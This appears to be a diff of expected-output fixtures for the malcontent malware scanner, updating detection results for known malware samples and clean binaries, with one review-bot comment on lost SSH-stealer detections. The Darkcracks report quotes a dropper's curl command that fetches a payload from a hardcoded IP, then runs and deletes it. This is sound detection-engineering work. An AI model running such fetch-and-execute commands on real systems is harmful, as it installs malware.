--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| @@ -14,7 +14,6 @@ | +HIGH | **[data/builtin/appkit](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/builtin/appkit.yara#appkit)** | Includes AppKit, a web3 blockchain library | [Price impact reflects the change in market price due to your trade](https://github.com/search?q=Price+impact+reflects+the+change+in+market+price+due+to+your+trade&type=code)
[Select which chain to connect to your multi](https://github.com/search?q=Select+which+chain+to+connect+to+your+multi&type=code) | | +MEDIUM | **[anti-static/obfuscation/generic/hex_conversion](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/generic/hex_conversion.yara#hex_parse)** | converts hex data to ASCII | [toString("hex");](https://github.com/search?q=toString%28%22hex%22%29%3B&type=code) | | +MEDIUM | **[anti-static/obfuscation/js/char_codes](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/js/char_codes.yara#character_obfuscation)** | obfuscated javascript that relies on character manipulation | [charAt](https://github.com/search?q=charAt&type=code)
[charCodeAt](https://github.com/search?q=charCodeAt&type=code)
[const](https://github.com/search?q=const&type=code)
[fromCharCode](https://github.com/search?q=fromCharCode&type=code)
[function(](https://github.com/search?q=function%28&type=code)
[length](https://github.com/search?q=length&type=code)
[push](https://github.com/search?q=push&type=code)
[shift](https://github.com/search?q=shift&type=code)
[toString](https://github.com/search?q=toString&type=code)
[{return](https://github.com/search?q=%7Breturn&type=code) | -| +MEDIUM | **[c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#hardcoded_ip)** | hardcoded IP address | [114.243.154.69](https://github.com/search?q=114.243.154.69&type=code)
[13.182.181.343](https://github.com/search?q=13.182.181.343&type=code)
[13.23.32.42](https://github.com/search?q=13.23.32.42&type=code)
[14.22.33.243](https://github.com/search?q=14.22.33.243&type=code)
[14.52.54.92](https://github.com/search?q=14.52.54.92&type=code)
[146.288.257.686](https://github.com/search?q=146.288.257.686&type=code)
[15.15.34.34](https://github.com/search?q=15.15.34.34&type=code)
[15.21.28.36](https://github.com/search?q=15.21.28.36&type=code)
[15.34.34.56](https://github.com/search?q=15.34.34.56&type=code)
[153.41.153.567](https://github.com/search?q=153.41.153.567&type=code)
[156.153.41.153](https://github.com/search?q=156.153.41.153&type=code)
[172.14.22.33](https://github.com/search?q=172.14.22.33&type=code)
[178.311.311.743](https://github.com/search?q=178.311.311.743&type=code)
[181.132.465.255](https://github.com/search?q=181.132.465.255&type=code)
[198.172.14.22](https://github.com/search?q=198.172.14.22&type=code)
[21.28.36.36](https://github.com/search?q=21.28.36.36&type=code)
[21.507.477.106](https://github.com/search?q=21.507.477.106&type=code)
[22.33.243.463](https://github.com/search?q=22.33.243.463&type=code)
[23.32.42.47](https://github.com/search?q=23.32.42.47&type=code)
[24.26.45.35](https://github.com/search?q=24.26.45.35&type=code)
[243.427.41.993](https://github.com/search?q=243.427.41.993&type=code)
[25.27.52.74](https://github.com/search?q=25.27.52.74&type=code)
[25.34.35.14](https://github.com/search?q=25.34.35.14&type=code)
[26.45.35.92](https://github.com/search?q=26.45.35.92&type=code)
[26.45.64.83](https://github.com/search?q=26.45.64.83&type=code)
[26.47.64.85](https://github.com/search?q=26.47.64.85&type=code)
[27.52.74.77](https://github.com/search?q=27.52.74.77&type=code)
[288.146.686.257](https://github.com/search?q=288.146.686.257&type=code)
[288.257.686.318](https://github.com/search?q=288.257.686.318&type=code)
[294.169.558.47](https://github.com/search?q=294.169.558.47&type=code)
[311.178.743.311](https://github.com/search?q=311.178.743.311&type=code)
[311.311.743.384](https://github.com/search?q=311.311.743.384&type=code)
[325.737.732.76](https://github.com/search?q=325.737.732.76&type=code)
[335.749.748.752](https://github.com/search?q=335.749.748.752&type=code)
[347.763.768.74](https://github.com/search?q=347.763.768.74&type=code)
[407.325.737.732](https://github.com/search?q=407.325.737.732&type=code)
[414.335.749.748](https://github.com/search?q=414.335.749.748&type=code)
[422.347.763.768](https://github.com/search?q=422.347.763.768&type=code)
[427.41.993.498](https://github.com/search?q=427.41.993.498&type=code)
[486.21.507.477](https://github.com/search?q=486.21.507.477&type=code)
[515.24.49.525](https://github.com/search?q=515.24.49.525&type=code)
[52.14.93.54](https://github.com/search?q=52.14.93.54&type=code)
[585.33.579.602](https://github.com/search?q=585.33.579.602&type=code)
[65.65.98.98](https://github.com/search?q=65.65.98.98&type=code)
[652.193.936.325](https://github.com/search?q=652.193.936.325&type=code)
[662.198.172.14](https://github.com/search?q=662.198.172.14&type=code)
[678.243.427.41](https://github.com/search?q=678.243.427.41&type=code)
[732.76.734.734](https://github.com/search?q=732.76.734.734&type=code)
[737.325.76.732](https://github.com/search?q=737.325.76.732&type=code)
[737.732.76.157](https://github.com/search?q=737.732.76.157&type=code)
[751.338.748.752](https://github.com/search?q=751.338.748.752&type=code)
[76.732.734.734](https://github.com/search?q=76.732.734.734&type=code)
[78.24.65.51](https://github.com/search?q=78.24.65.51&type=code)
[83.26.47.64](https://github.com/search?q=83.26.47.64&type=code)
[88.39.55.87](https://github.com/search?q=88.39.55.87&type=code)
[92.97.47.52](https://github.com/search?q=92.97.47.52&type=code)
[942.12.872.258](https://github.com/search?q=942.12.872.258&type=code)
[97.47.52.84](https://github.com/search?q=97.47.52.84&type=code) | | +MEDIUM | **[credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain)** | May access the macOS keychain | [keychain](https://github.com/search?q=keychain&type=code) | | +MEDIUM | **[crypto/blockchain](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/blockchain.yara#blockchain)** | blockchain | [blockchain](https://github.com/search?q=blockchain&type=code) | | +MEDIUM | **[crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid)** | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | diff --git a/tests/javascript/clean/connection.js.simple b/tests/javascript/clean/connection.js.simple index f12daff62..17d1d7075 100644 --- a/tests/javascript/clean/connection.js.simple +++ b/tests/javascript/clean/connection.js.simple @@ -1,6 +1,7 @@ # javascript/clean/connection.js: high anti-static/base64/exec: high anti-static/obfuscation/generic/hex_conversion: medium +c2/addr/ip: medium credential/password: low data/embedded/base64_terms: medium data/embedded/base64_url: medium diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple index 11e2c16ae..9ecc2fe8e 100644 --- a/tests/linux/2021.FontOnLake/45E9.elf.simple +++ b/tests/linux/2021.FontOnLake/45E9.elf.simple @@ -2,6 +2,7 @@ 3P/elastic/rootkit_fontonlake: critical 3P/sig_base/susp_elf_upx: critical anti-static/packer/upx: high +c2/addr/ip: high c2/addr/ip_port: medium credential/password: low credential/ssh: medium diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple index f4f365a1f..d8364dc9c 100644 --- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple +++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple 
@@ -1,5 +1,6 @@ # linux/2022.Symbiote/kerneldev.so.bkp: critical 3P/threat_hunting/keylogger: medium +c2/addr/ip: high c2/discovery/ip_dns_resolver: medium credential/keylogger: medium credential/password: low diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index f058100cf..69a0bb91c 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple @@ -6,7 +6,6 @@ 3P/threat_hunting/xmrig: medium anti-static/base64/exec: high c2/addr/http_ip: high -c2/addr/ip: medium c2/addr/ip_port: high c2/tool_transfer/download: medium c2/tool_transfer/http_ip_temp: critical @@ -21,10 +20,11 @@ evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/se: medium evasion/bypass_security/linux/se_disable: high evasion/bypass_security/linux/ufw: medium +evasion/covert_location/dev_shm: critical evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/etc_ld.so.preload: high evasion/hidden_paths/hidden: high evasion/hidden_paths/var_tmp: medium +evasion/hijack_execution/etc_ld.so.preload: high evasion/logging/syslog: medium evasion/mimicry/fake_process: critical exec/install_additional/package_install: medium @@ -35,7 +35,6 @@ exec/shell/pipe_sh: medium exec/system_controls/apparmor: high exec/system_controls/stop: low exec/system_controls/systemd: medium -exfil/stealer/ssh: high fs/attributes/chattr: high fs/directory/create: low fs/file/delete: medium diff --git a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple new file mode 100644 index 000000000..77a248d51 --- /dev/null +++ b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple 
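Review bot: The Kinsing `install.sh` fixture loses two detections in this commit — `c2/addr/ip: medium` in the first hunk and `exfil/stealer/ssh: high` in the third — on a known-malicious sample, and the Kaiji fixture later in the patch drops `exfil/stealer/ssh` from high to medium while the clean `appsec-rules.json` and `default_config.json` fixtures lose it entirely. The `rules/exfil/stealer/ssh.yara` change that causes this is not in view, so I cannot tell whether the loss on Kinsing is an accepted cost of the clean-corpus fix or an unintended side effect; the PR description should state which, ideally with the `ssh.yara` strings that no longer match in Kinsing quoted in a comment on the rule.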
@@ -0,0 +1,10 @@ +# linux/2024.Beast/wyoming-xray-undress-robert: critical +fs/path/dev: medium +fs/path/tmp: medium +impact/ransom/linux: high +impact/shutdown: medium +lateral/vmware/vms: medium +malware/family/beast: critical +persist/daemon: medium +process/create: low +process/multithreaded: low diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index a61e3bbb0..eca36a716 100644 --- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md @@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | CRITICAL | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) | -| CRITICAL | [evasion/hidden_paths/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | +| CRITICAL | [evasion/covert_location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | | CRITICAL | [evasion/self_deletion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | | HIGH | [c2/addr/http_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Ex](http://179.191.68.85:82/vendor/sebastian/diff/src/Ex) | diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index c854c3864..07d544000 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -26,7 +26,7 @@ exec/program: medium exec/shell/exec: medium exec/system_controls/systemd: medium exfil/stealer/linux_server: high -exfil/stealer/ssh: high +exfil/stealer/ssh: medium fs/directory/list: low fs/directory/remove: low fs/file/delete: low @@ -48,7 +48,6 @@ fs/permission/chown: medium fs/permission/get: low fs/permission/modify: medium fs/proc/stat: medium -impact/degrade/linux_paths: high impact/exploit/cve_list: medium impact/remote_access/kill_rm: medium impact/remote_access/reverse_shell: high diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple new file mode 100644 index 000000000..2fa0f18ea --- /dev/null +++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple 
@@ -0,0 +1,74 @@ +# linux/2024.TellYouThePass/uranus-ack-mike-cat: critical +3P/arkbird/solg_ran_elf: critical +3P/threat_hunting/torat: medium +c2/addr/ip_port: high +collect/databases/mysql: medium +collect/databases/postgresql: medium +collect/databases/sqlite: medium +credential/password: low +credential/shell/bash_history: high +crypto/aes: low +crypto/ecdsa: low +crypto/ed25519: low +data/encoding/base64: low +data/encoding/json: low +data/encoding/json_decode: low +data/hash/md5: low +discover/system/cpu_info: low +discover/system/hostname_get: low +discover/system/platform: low +discover/user/HOME: low +discover/user/USER: low +evasion/hidden_paths/hidden: medium +exec/cmd: medium +exec/plugin: low +exec/program: medium +exec/shell/background_sleep: medium +exec/shell/exec: medium +exec/shell/nohup: medium +exec/system_controls/stop: low +exec/system_controls/systemd: medium +exfil/office_file_ext: medium +exfil/stealer/office: high +fs/directory/remove: low +fs/file/delete: low +fs/file/make_executable: high +fs/file/read: low +fs/file/write: low +fs/path/etc: low +fs/path/etc_hosts: medium +fs/path/etc_initd: medium +fs/path/etc_resolv.conf: low +fs/path/relative: medium +fs/path/tmp: medium +fs/path/var: low +fs/permission/chown: medium +fs/permission/modify: medium +impact/ransom/note: high +impact/remote_access/reverse_shell: medium +net/dns: low +net/dns/servers: low +net/dns/txt: low +net/http/cookies: medium +net/http/post: medium +net/http/request: low +net/ip: low +net/ip/addr: medium +net/ip/multicast_send: low +net/ip/parse: medium +net/resolve/hostname: low +net/socket/listen: medium +net/socket/local_addr: low +net/socket/peer_address: low +net/socket/receive: low +net/socket/send: low +net/tcp/connect: medium +net/tcp/sftp: medium +net/tcp/ssh: medium +net/udp/receive: low +net/udp/send: low +net/url/request: medium +os/fd/sendfile: low +os/kernel/netlink: low +persist/daemon: medium +sus/exclamation: medium 
diff --git a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple index 4a6b7d7f0..7010cb07e 100644 --- a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple +++ b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple @@ -1,5 +1,5 @@ # linux/2024.hadooken/crondr_as_bash.sh: critical -evasion/hidden_paths/chdir_unusual: high +evasion/covert_location/chdir_unusual: high evasion/mimicry/fake_process: high evasion/self_deletion/copy_run_delete: critical exec/shell/exec: medium diff --git a/tests/linux/2024.hadooken/ssh_worm.sh.simple b/tests/linux/2024.hadooken/ssh_worm.sh.simple index 70ef87cad..55554ebb8 100644 --- a/tests/linux/2024.hadooken/ssh_worm.sh.simple +++ b/tests/linux/2024.hadooken/ssh_worm.sh.simple @@ -3,6 +3,7 @@ anti-static/base64/eval: critical anti-static/base64/function_names: critical c2/addr/http_ip: high +c2/addr/ip: medium c2/tool_transfer/shell: medium credential/shell/bash_history: high credential/ssh: high diff --git a/tests/linux/2024.k4spreader/degrader.sh.simple b/tests/linux/2024.k4spreader/degrader.sh.simple index 8c438f33e..5d6c337f8 100644 --- a/tests/linux/2024.k4spreader/degrader.sh.simple +++ b/tests/linux/2024.k4spreader/degrader.sh.simple @@ -1,7 +1,7 @@ # linux/2024.k4spreader/degrader.sh: critical evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/etc_ld.so.preload: high +evasion/hijack_execution/etc_ld.so.preload: high fs/attributes/chattr: medium fs/path/etc: low impact/degrade/iptables: high diff --git a/tests/linux/2024.k4spreader/knlib.simple b/tests/linux/2024.k4spreader/knlib.simple index 72ee35646..435f19650 100644 --- a/tests/linux/2024.k4spreader/knlib.simple +++ b/tests/linux/2024.k4spreader/knlib.simple 
@@ -1,5 +1,5 @@ # linux/2024.k4spreader/knlib: critical -evasion/hidden_paths/chdir_unusual: high +evasion/covert_location/chdir_unusual: high evasion/self_deletion/copy_run_delete: critical exec/shell/exec: medium exec/shell/ignore_output: medium diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index 66178e9ec..4849ffd18 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -40,7 +40,8 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/chdir_unusual: medium +evasion/covert_location/chdir_unusual: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/dev_shm: critical evasion/hidden_paths/hidden: high evasion/hijack_execution/LD_LIBRARY_PATH: low diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple index 3534215a8..d05ad257d 100644 --- a/tests/linux/2024.kworker_pretenders/gafgyt.simple +++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple @@ -5,7 +5,7 @@ anti-static/packer/elf: high credential/ssh/d: medium data/base64/external: medium data/encoding/base64: low -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/var_run: medium evasion/hidden_paths/var_tmp: medium evasion/mimicry/fake_process: critical @@ -23,7 +23,6 @@ fs/path/usr_sbin: low fs/path/var: low fs/proc/arbitrary_pid: medium fs/proc/self_exe: medium -impact/degrade/linux_paths: high net/dns/servers: low net/http/request: low net/socket/send: low diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple index 08d5bcc23..79a6bc7ad 100644 --- a/tests/linux/2024.medusa/rkload.simple +++ b/tests/linux/2024.medusa/rkload.simple 
@@ -6,11 +6,12 @@ anti-static/xor/commands: high credential/ssh/d: medium discover/system/cpu_info: low discover/system/sysinfo: medium +evasion/covert_location/dev_shm: high evasion/hidden_paths/dev_shm: critical -evasion/hidden_paths/etc_ld.so.preload: medium evasion/hidden_paths/hidden: high evasion/hide_artifacts/system_directories: medium evasion/hijack_execution/LD_LIBRARY_PATH: low +evasion/hijack_execution/etc_ld.so.preload: medium exec/conditional/LANG: low exec/dylib/address_check: low exec/dylib/symbol_address: medium @@ -34,7 +35,6 @@ fs/proc/stat: medium fs/tempdir: low fs/tempdir/TMPDIR: low hw/cpu: medium -impact/degrade/linux_paths: high impact/exploit/GCONV_PATH: low impact/remote_access/reverse_shell: medium impact/rootkit/readdir_interceptor: high diff --git a/tests/linux/2024.miner_dropper/drop.sh.simple b/tests/linux/2024.miner_dropper/drop.sh.simple index 162645272..c7fa07548 100644 --- a/tests/linux/2024.miner_dropper/drop.sh.simple +++ b/tests/linux/2024.miner_dropper/drop.sh.simple @@ -2,7 +2,7 @@ c2/addr/http_ip: high c2/addr/ip: medium c2/tool_transfer/shell: critical -evasion/hidden_paths/chdir_unusual: critical +evasion/covert_location/chdir_unusual: critical exec/shell/busybox_exec: high exec/shell/exec: medium exec/shell/relative_semicolon: high diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple index 0152280c4..43567cf92 100644 --- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple +++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple 
@@ -1,7 +1,8 @@
-# linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: high
+# linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical
 anti-static/packer/elf: high
 anti-static/packer/high_entropy: medium
 anti-static/packer/upx: high
+c2/addr/ip: high
 credential/sniffer/bpf: medium
 fs/path/dev: medium
 fs/proc/self_exe: medium
diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple
index 94f37da54..21880ef60 100644
--- a/tests/linux/clean/appsec-rules.json.simple
+++ b/tests/linux/clean/appsec-rules.json.simple
@@ -35,7 +35,6 @@ exec/system_controls/apparmor: medium
 exec/tty/pathname: medium
 exfil: medium
 exfil/stealer/linux_server: high
-exfil/stealer/ssh: high
 fs/fifo_create: low
 fs/file/times_set: medium
 fs/lock_update: low
diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple
index d817e7c9e..83481e960 100644
--- a/tests/linux/clean/chrome.simple
+++ b/tests/linux/clean/chrome.simple
@@ -43,7 +43,7 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/ufw: medium
-evasion/hidden_paths/dev_shm: medium
+evasion/covert_location/dev_shm: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/process_injection/ptrace: medium
 exec/cmd: medium
diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple
index 4846bce6a..31cafc926 100644
--- a/tests/linux/clean/clickhouse.simple
+++ b/tests/linux/clean/clickhouse.simple
@@ -52,7 +52,7 @@ discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: low
 evasion/bypass_security/linux/ufw: medium
-evasion/hidden_paths/dev_shm: medium
+evasion/covert_location/dev_shm: medium
 evasion/hidden_paths/hidden: medium
 evasion/hidden_paths/relative_hidden: low
 evasion/hijack_execution/DYLD_LIBRARY_PATH: medium
diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple
index bf3bbcfb2..809108804 100644
--- a/tests/linux/clean/containerd.simple
+++ b/tests/linux/clean/containerd.simple
@@ -27,8 +27,8 @@ discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: medium
 discover/user/USER: low
-evasion/hidden_paths/dev_mqueue: medium
-evasion/hidden_paths/dev_shm: medium
+evasion/covert_location/dev_mqueue: medium
+evasion/covert_location/dev_shm: medium
 evasion/hidden_paths/var_run: medium
 evasion/process_injection/ptrace: medium
 exec/plugin: low
@@ -72,7 +72,6 @@ fs/unmount: low
 fs/watch: low
 hw/dev/block_ice: medium
 hw/dev/mapper: medium
-impact/degrade/linux_paths: medium
 impact/remote_access/heartbeat: medium
 net/dns: low
 net/dns/reverse: medium
diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple
index f08d0ceba..92c43b7f1 100644
--- a/tests/linux/clean/default_config.json.simple
+++ b/tests/linux/clean/default_config.json.simple
@@ -36,7 +36,6 @@ exec/system_controls/apparmor: medium
 exec/tty/pathname: medium
 exfil: medium
 exfil/stealer/linux_server: high
-exfil/stealer/ssh: high
 fs/fifo_create: low
 fs/file/times_set: medium
 fs/lock_update: low
diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple
index 779b0b5bb..ed8d10b80 100644
--- a/tests/linux/clean/ld-2.27.so.simple
+++ b/tests/linux/clean/ld-2.27.so.simple
@@ -1,8 +1,8 @@
 # linux/clean/ld-2.27.so: medium
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
-evasion/hidden_paths/etc_ld.so.preload: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
+evasion/hijack_execution/etc_ld.so.preload: medium
 fs/path/etc: low
 fs/path/var: low
 fs/path/var_profile: medium
diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple
index bc7a4826d..3f1bafa25 100644
--- a/tests/linux/clean/nvim.simple
+++ b/tests/linux/clean/nvim.simple
@@ -17,6 +17,7 @@ discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
 evasion/hidden_paths/hidden: medium
+evasion/hidden_paths/x11: low
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
 exec/plugin: low
@@ -53,7 +54,6 @@ fs/tempdir/TEMP: low
 fs/tempdir/TMPDIR: low
 fs/tempdir/create: low
 fs/tempdir/tempfile_create: low
-impact/degrade/linux_paths: medium
 net/dns/servers: low
 net/download/fetch: medium
 net/http/post: medium
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index c3c83a044..a25750e39 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -5,7 +5,6 @@
 | HIGH | [impact/exploit/overflow_shellcode](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/overflow-shellcode.yara#exploit) | Buffer overflow exploit | [address](https://github.com/search?q=address&type=code)
[offset](https://github.com/search?q=offset&type=code)
[padding](https://github.com/search?q=padding&type=code)
[shellcode](https://github.com/search?q=shellcode&type=code) |
 | MEDIUM | [3P/threat_hunting/keylogger](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#keylogger_keyword_offensive_tool_keyword) | [references 'keylogger keyword' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [KeyLogger](https://github.com/search?q=KeyLogger&type=code) |
 | MEDIUM | [3P/threat_hunting/slowloris](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#SlowLoris_offensive_tool_keyword) | [references 'SlowLoris' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [Slowloris](https://github.com/search?q=Slowloris&type=code) |
-| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#hardcoded_ip) | hardcoded IP address | [138.112.25.25](https://github.com/search?q=138.112.25.25&type=code)
[14.22.331.22](https://github.com/search?q=14.22.331.22&type=code)
